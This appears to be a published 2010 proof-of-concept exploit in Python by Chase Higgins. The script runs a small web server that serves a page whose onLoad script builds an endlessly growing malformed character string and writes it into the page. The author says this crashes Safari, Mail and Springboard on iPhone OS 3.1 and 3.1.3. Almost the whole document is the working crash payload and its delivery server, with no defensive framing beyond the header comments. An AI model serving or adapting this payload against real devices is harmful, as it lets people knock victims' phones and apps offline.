55 lines
No EOL
1.3 KiB
Python
Executable file
55 lines
No EOL
1.3 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
|
|
#this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
|
|
#all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my
|
|
#device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it
|
|
|
|
# Exploit Title: iPhone Springboard Malformed Character Crash PoC
|
|
# Date: 3/15/2010
|
|
# Author: Chase Higgins
|
|
# Software Link: apple.com/iphone/
|
|
# Version: iPhone 2G, iPhone 3GS
|
|
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
|
|
# CVE :
|
|
# Code : none
|
|
|
|
import sys, socket;
|
|
|
|
def main():
|
|
html = """
|
|
<html>
|
|
<head>
|
|
<script>
|
|
function triggerCrash(){
|
|
evil_div = document.getElementById('evilDiv');
|
|
var evil_string = "\x4e\x5b\x01";
|
|
i = 0;
|
|
|
|
while (i < 1000){
|
|
evil_string = evil_string + evil_string;
|
|
}
|
|
|
|
evil_div.innerHTML = evil_string;
|
|
}
|
|
</script>
|
|
</head>
|
|
<body onLoad="triggerCrash()">
|
|
<div id="evilDiv">
|
|
|
|
</div>
|
|
</body>
|
|
</html>
|
|
""";
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
|
|
s.bind(('',2121));
|
|
s.listen(1);
|
|
|
|
while True:
|
|
channel, details = s.accept();
|
|
print channel.recv(1024);
|
|
channel.send(html);
|
|
channel.close();
|
|
|
|
main(); |